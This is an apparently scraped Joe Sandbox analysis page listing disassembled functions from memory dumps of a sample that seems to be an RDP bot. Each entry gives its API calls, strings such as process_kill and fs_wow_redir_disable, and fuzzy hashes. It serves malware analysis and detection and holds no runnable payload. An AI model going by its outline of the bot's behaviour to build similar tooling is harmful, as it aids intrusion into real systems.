Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 477549591-1116693529
Opcode ID: 690b58d102fe84c2b86515d0c4965d340f10ee8ca09de28bfe570b5747ffb1e4
Instruction ID: bce896ad159b2367b25f385f6d9e89c230b75b340d259f634dac575b50acd7b9
Opcode Fuzzy Hash: 690b58d102fe84c2b86515d0c4965d340f10ee8ca09de28bfe570b5747ffb1e4
Instruction Fuzzy Hash: 3E218C59F0CF0346FB659FA7A0D037E239AAF50BA1F0444B9CC0E462B5EE2DE9488341

Function 00007FFE1150B8B3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE1150B8C9
Process32Next.KERNEL32 ref: 00007FFE1150B8DF
strcmp.MSVCRT ref: 00007FFE1150B921
OpenProcess.KERNEL32 ref: 00007FFE1150B939
TerminateProcess.KERNEL32 ref: 00007FFE1150B953
GetLastError.KERNEL32 ref: 00007FFE1150B961
GetLastError.KERNEL32 ref: 00007FFE1150BB38

Strings

[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FFE1150B973
process_kill, xrefs: 00007FFE1150B96C

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 477549591-1116693529
Opcode ID: 200fecf984d99c778fc9d4cf007665976587b1201818771fa11b1826471faf7d
Instruction ID: b67f50d4ad18e3d70335e14a4826c2a9bc5c6b695fb1f38343918f19e74bb989
Opcode Fuzzy Hash: 200fecf984d99c778fc9d4cf007665976587b1201818771fa11b1826471faf7d
Instruction Fuzzy Hash: 45218C59F0CF0346FB659FA7A0C037E239AAF50BA0F0444B9CC0E462B5EE2DE9488341

Function 00007FF76A90DEBE Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF76A90DECE
GetProcAddress.KERNEL32 ref: 00007FF76A90DEE5
LoadLibraryW.KERNEL32 ref: 00007FF76A90DEF3
GetProcAddress.KERNEL32 ref: 00007FF76A90DF03

Strings

advapi32.dll, xrefs: 00007FF76A90DEEC
SystemFunction036, xrefs: 00007FF76A90DEF9
rand_s, xrefs: 00007FF76A90DEDB
msvcrt.dll, xrefs: 00007FF76A90DEC7

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 5291cd93b414ba6c424e77f612c9ff6642894636800bc1888b68a92809d904ce
Instruction ID: 2b607826e2c448567f1bef85bdea1ae55a8ade4129dda40189a0585a9cc5f9f4
Opcode Fuzzy Hash: 5291cd93b414ba6c424e77f612c9ff6642894636800bc1888b68a92809d904ce
Instruction Fuzzy Hash: A7F0BD64E0AB17D4F906FB51FC44064A7A4AF59798BE401B6C81D97360EE2CAD4AC720

Function 00007FFE115109FE Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFE11510A0E
GetProcAddress.KERNEL32 ref: 00007FFE11510A25
LoadLibraryW.KERNEL32 ref: 00007FFE11510A33
GetProcAddress.KERNEL32 ref: 00007FFE11510A43

Strings

SystemFunction036, xrefs: 00007FFE11510A39
rand_s, xrefs: 00007FFE11510A1B
advapi32.dll, xrefs: 00007FFE11510A2C
msvcrt.dll, xrefs: 00007FFE11510A07

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 506ee0f3f3ca59bbb06e7e868019388be36614ff2e6b08981a805f7823c04824
Instruction ID: fe72d306c91116fe9a1e6ed6d24defc2b79674d01f28da50e3365e3a765c42c9
Opcode Fuzzy Hash: 506ee0f3f3ca59bbb06e7e868019388be36614ff2e6b08981a805f7823c04824
Instruction Fuzzy Hash: 10F0B225A1BE17A0EB16EB23FC545A427AABF587A4F8445B2C80D06330EE2CA54AC300

Function 00007FFE115053D1 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FFE1150546F
GetLastError.KERNEL32 ref: 00007FFE1150548A

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

fs_file_copy, xrefs: 00007FFE1150543E, 00007FFE115054A1, 00007FFE115055EF
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FFE115055F6
NULL, xrefs: 00007FFE115055CD, 00007FFE115055D9
[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FFE115054A8
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FFE11505445

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: 54de73e146ac7064324100addf3f4ba1824c82c16014dbecaa786215b2cebb3d
Instruction ID: e2c45d7846a6153bddb66184767f880b82d1229028d415b55ac4bfb56984a757
Opcode Fuzzy Hash: 54de73e146ac7064324100addf3f4ba1824c82c16014dbecaa786215b2cebb3d
Instruction Fuzzy Hash: BF419661E2CE1781F7218A97A4003FD265DBF05BBDE5911BAD90F472B0EE7DE6418701

Function 00007FFE11504E05 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32 ref: 00007FFE11504E1C
GetLastError.KERNEL32 ref: 00007FFE11504E73

Strings

fs_file_delete, xrefs: 00007FFE11504E55, 00007FFE11504E81, 00007FFE11504FB1
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FFE11504E88
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE11504E5C
NULL, xrefs: 00007FFE11504FA2
[I] (%s) -> Done(path=%s), xrefs: 00007FFE11504FB8

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: c21b6aeb0182c77b96eaafe1d01d6e28c3d2b4e6756fc38210943da2775030a1
Instruction ID: 9c306574ab49fa7dbe5a399a0f776a54a82223923168fb944f3e3d88b3f36288
Opcode Fuzzy Hash: c21b6aeb0182c77b96eaafe1d01d6e28c3d2b4e6756fc38210943da2775030a1
Instruction Fuzzy Hash: 39315E52E1CE0786FB329687A4483BD294E4F41375F5900BEC92E473B5EE6CAC858203

Function 00007FF76A907754 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF76A90778E
strlen.MSVCRT ref: 00007FF76A907799

Strings

(needle != NULL), xrefs: 00007FF76A9077C4
str_match, xrefs: 00007FF76A9077CB, 00007FF76A907804, 00007FF76A90783D
((match == NULL) || (match_len != NULL)), xrefs: 00007FF76A907836
(pattern != NULL), xrefs: 00007FF76A9077FD
H:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FF76A9077BD, 00007FF76A9077F6, 00007FF76A90782F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9077D2, 00007FF76A90780B, 00007FF76A907844

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen
String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
API String ID: 39653677-2979476222
Opcode ID: 30e48ffb3e4467a7c56c0ef273bd327010d49d220472400fb6c61673ee193160
Instruction ID: b292c9b088ef8e1255aa5498b520a98284a7d732e82b9022731f28155d1fd0fe
Opcode Fuzzy Hash: 30e48ffb3e4467a7c56c0ef273bd327010d49d220472400fb6c61673ee193160
Instruction Fuzzy Hash: C551DE51E0CB87D9FA11AB1599503BAA6517B127D8FF440FADE4E8B291DE3CA901C320

Function 00007FFE11501C27 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

EnterCriticalSection.KERNEL32 ref: 00007FFE11501C5F
GetProcessHeap.KERNEL32 ref: 00007FFE11501CBB
HeapFree.KERNEL32 ref: 00007FFE11501CCC
LeaveCriticalSection.KERNEL32 ref: 00007FFE11501CEF

Strings

[D] (%s) -> Requested(handler=0x%p), xrefs: 00007FFE11501C3A
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE11501CDC
ebus_unsubscribe, xrefs: 00007FFE11501C33, 00007FFE11501CD5, 00007FFE11501D0C
[E] (%s) -> Failed(handler=0x%p), xrefs: 00007FFE11501D13

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalHeapSection$EnterFreeLeaveProcessfflushfwrite
String ID: [D] (%s) -> Requested(handler=0x%p)$[E] (%s) -> Failed(handler=0x%p)$[I] (%s) -> Done(handler=0x%p)$ebus_unsubscribe
API String ID: 2011334650-1527096901
Opcode ID: a896232022ea3a4dac404a97486e60f1f2b53ef0e47165ade3ff46fcc3061495
Instruction ID: 67b12ce123dfcb8beb88a15c1c83ff88ff456cae129f559e8b76454aeaef5ebb
Opcode Fuzzy Hash: a896232022ea3a4dac404a97486e60f1f2b53ef0e47165ade3ff46fcc3061495
Instruction Fuzzy Hash: BB212F50E4EE0690FF529B97E8D41783359AF44BB4F4844B9CD0E47375EE2CE9858312

Function 00007FFE1150A639 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 129stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00007FFE1150A6B1

Part of subcall function 00007FFE115069A8: ExpandEnvironmentStringsA.KERNEL32 ref: 00007FFE115069DC

Part of subcall function 00007FFE1150C647: WaitForSingleObject.KERNEL32 ref: 00007FFE1150C658

Part of subcall function 00007FFE1150C7E5: CloseHandle.KERNEL32 ref: 00007FFE1150C7FD
Part of subcall function 00007FFE1150C7E5: CloseHandle.KERNEL32 ref: 00007FFE1150C803

Strings

/min, xrefs: 00007FFE1150A710
(, xrefs: 00007FFE1150A75E
start, xrefs: 00007FFE1150A71C
ORRE, xrefs: 00007FFE1150A769
-RGMGRP-, xrefs: 00007FFE1150A774
cmd.exe, xrefs: 00007FFE1150A734

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseHandle$EnvironmentExpandObjectSingleStringsWaitstrcpy
String ID: ($-RGMGRP-$/min$ORRE$cmd.exe$start
API String ID: 2015099158-1150742974
Opcode ID: 8d0f3c23c94b47aae8ab67239b8eed1acd430e4788797e24a8d47570cc03ed35
Instruction ID: 27efede4b156430023b4924f4ebd4aebaa686b212069b0add9ff71443cca187e
Opcode Fuzzy Hash: 8d0f3c23c94b47aae8ab67239b8eed1acd430e4788797e24a8d47570cc03ed35
Instruction Fuzzy Hash: 8C51C236A08F8285E7218B56E4403FE73A9EB847A4F40427ADA8D47BB5EF3CD549C740

Function 00007FF76A90A134 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,?,?,00007FF76A9150F8,00007FF76A915100,00007FF76A900000,?,?,00007FF76A90A348,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A90A1DD
VirtualProtect.KERNEL32(?,?,?,?,00007FF76A9150F8,00007FF76A915100,00007FF76A900000,?,?,00007FF76A90A348,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A90A244
GetLastError.KERNEL32(?,?,?,?,00007FF76A9150F8,00007FF76A915100,00007FF76A900000,?,?,00007FF76A90A348,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A90A24E

Strings

VirtualProtect failed with code 0x%x, xrefs: 00007FF76A90A139, 00007FF76A90A254
Address %p has no image-section, xrefs: 00007FF76A90A195
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF76A90A1F2

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 637304234-2123141913
Opcode ID: 6903964d322ee31ad0e95d65d8f33e82ba9bc0ba0f8e816a8c1169f1d38d6b35
Instruction ID: 5a848abc75bcc1767608d2847cd5483fdb36bbe29aece569b0c9ba3018d6e0f6
Opcode Fuzzy Hash: 6903964d322ee31ad0e95d65d8f33e82ba9bc0ba0f8e816a8c1169f1d38d6b35
Instruction Fuzzy Hash: EA31E475B09B02C9FA05AF19E8801B9B361EF85BD8FA481B9DD0D87794DE3CE845C790

Function 00007FFE1150CE04 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FFE1150CEAD
VirtualProtect.KERNEL32 ref: 00007FFE1150CF14
GetLastError.KERNEL32 ref: 00007FFE1150CF1E

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00007FFE1150CEC2
Address %p has no image-section, xrefs: 00007FFE1150CE65
VirtualProtect failed with code 0x%x, xrefs: 00007FFE1150CE09, 00007FFE1150CF24

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 637304234-2123141913
Opcode ID: 53435919785d44fabd46a964e909bdfa347527f1b757c0e445b993f3e6d3f1bf
Instruction ID: 889a29139d0caca5ec544f4ce804cc2ba9a37d594fb4fd68ced37b31382ed187
Opcode Fuzzy Hash: 53435919785d44fabd46a964e909bdfa347527f1b757c0e445b993f3e6d3f1bf
Instruction Fuzzy Hash: BB319172B09F4285EB119F57E88056C676AEF86BA4F4481B9DE0D073B4DE3CE485C740

Function 00007FFE115020A0 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FFE115020B2

Strings

(s != NULL), xrefs: 00007FFE115020F9
ip4_from_str, xrefs: 00007FFE11502100, 00007FFE11502130
H:/Projects/rdp/bot/codebase/net.c, xrefs: 00007FFE115020F2, 00007FFE11502122
(v != NULL), xrefs: 00007FFE11502129
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11502107, 00007FFE11502137

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: inet_addr
String ID: (s != NULL)$(v != NULL)$H:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
API String ID: 1393076350-2916536452
Opcode ID: 856ccb1ac7e905e62fd55fe33b648935fc0db266156acb32b13718a822532609
Instruction ID: ca27b736255fc436e72a7aaa86e8a47a564abb30ddc294a7bae83445ef8cef08
Opcode Fuzzy Hash: 856ccb1ac7e905e62fd55fe33b648935fc0db266156acb32b13718a822532609
Instruction Fuzzy Hash: 841130E4A0CE0796FB519FA6E8203B8239ABF00374F5449B6D50D4A2B6DF3DE945C301

Function 00007FF76A90179C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76A901694: LoadLibraryA.KERNEL32(?,?,service,000001DE38FB13D0,00007FF76A909404), ref: 00007FF76A9016A2

GetLastError.KERNEL32 ref: 00007FF76A901818

Part of subcall function 00007FF76A901613: GetProcAddress.KERNEL32(?,?,00000000,000001DE38FB13D0,?,00007FF76A90941F), ref: 00007FF76A901633

Strings

Done, xrefs: 00007FF76A9017F4
[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu), xrefs: 00007FF76A901828
Wow64RevertWow64FsRedirection, xrefs: 00007FF76A9017BD
kernel32, xrefs: 00007FF76A9017A9
[I] (%s) -> %s, xrefs: 00007FF76A901802
fs_wow_redir_revert, xrefs: 00007FF76A9017FB, 00007FF76A901821

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProc
String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
API String ID: 3511525774-1584720945
Opcode ID: c42ed83aae933e437515cd80b13881595a2d18c916c862bd0cfde7413737ae74
Instruction ID: 87be8a9c4bc80f47187ffb55be7d0dd7d06e67e26b3d1e741d60cdc10d01fab3
Opcode Fuzzy Hash: c42ed83aae933e437515cd80b13881595a2d18c916c862bd0cfde7413737ae74
Instruction Fuzzy Hash: 3C11E820F1D747C9FB16B714A8913B5A2646F41388FF440BAD80ECA2A1EE6DEE45C330

Function 00007FF76A901700 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76A901694: LoadLibraryA.KERNEL32(?,?,service,000001DE38FB13D0,00007FF76A909404), ref: 00007FF76A9016A2

Part of subcall function 00007FF76A901613: GetProcAddress.KERNEL32(?,?,00000000,000001DE38FB13D0,?,00007FF76A90941F), ref: 00007FF76A901633

GetLastError.KERNEL32 ref: 00007FF76A901760

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

fs_wow_redir_disable, xrefs: 00007FF76A901743, 00007FF76A901769
Done, xrefs: 00007FF76A90173C
kernel32, xrefs: 00007FF76A901704
Wow64DisableWow64FsRedirection, xrefs: 00007FF76A901718
[I] (%s) -> %s, xrefs: 00007FF76A90174A
[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu), xrefs: 00007FF76A901770

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProcfflushfwrite
String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
API String ID: 1533789296-1853374401
Opcode ID: cd1bc05b9ec3a23c4e34d08ce4e247aac6b91763abaec2c8ac2612d9e2c97bf4
Instruction ID: 197dc74e6dd7c5993143771dd1551c2d8a31f11812d2ef1f88c5ae23b0a73352
Opcode Fuzzy Hash: cd1bc05b9ec3a23c4e34d08ce4e247aac6b91763abaec2c8ac2612d9e2c97bf4
Instruction Fuzzy Hash: 5D01E960F1DB07D9FB16B714A8913B4A6606F01388FF400BAD41EC62A1EF6DEE568330

Function 00007FFE11503A20 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON

Download Yara Rule

